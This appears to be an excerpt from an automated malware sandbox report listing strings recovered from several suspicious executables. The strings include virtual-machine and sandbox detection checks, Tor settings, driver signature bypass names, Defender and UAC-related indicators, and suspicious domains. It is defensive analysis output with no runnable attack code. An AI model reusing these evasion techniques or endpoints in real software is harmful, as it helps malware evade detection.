                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Datacenter without Hyper-V Core
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
                        Source: B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1935720214.0000000005DC0000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000002.1950262474.0000000005EAF000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000002.1941782899.0000000004437000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                        Source: u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: VMWARE_VIRTUAL
                        Source: t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000002.1930649503.00000000043AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`:@
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                        Source: u69w.1.exe, 00000023.00000002.1911027770.0000000000A22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
                        Source: 0FR80IiNvxJZyXnpOgiDlYNV.exe, 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmpBinary or memory string: main.isRunningInsideVMWare
                        Source: B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1918787360.00000000041ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V C$
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Datacenter without Hyper-V Full
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Enterprise without Hyper-V Full
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Microsoft Hyper-V Server
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: QEMU_HARDU
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                        Source: svchost.exe, 00000008.00000003.1378683113.000002127EC44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Standard without Hyper-V Full
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Enterprise without Hyper-V Core
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
                        Source: u69w.1.exe, 00000023.00000002.1911027770.0000000000A22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                        Source: H6XhhPCeuwAb2QQK3C3B1Lwl.exe, 0000001B.00000002.1937881733.00000000040ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`J
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: 6without Hyper-V for Windows Essential Server Solutions
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000002.2263801025.000000000412D000.00000004.00000020.00020000.00000000.sdmp, 6dpl9L7LbyabhVQNXZXXKjGL.exe, 00000022.00000002.2121441955.000000000412D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`:
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
                        Source: svchost.exe, 00000006.00000002.1735098946.000001D257602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
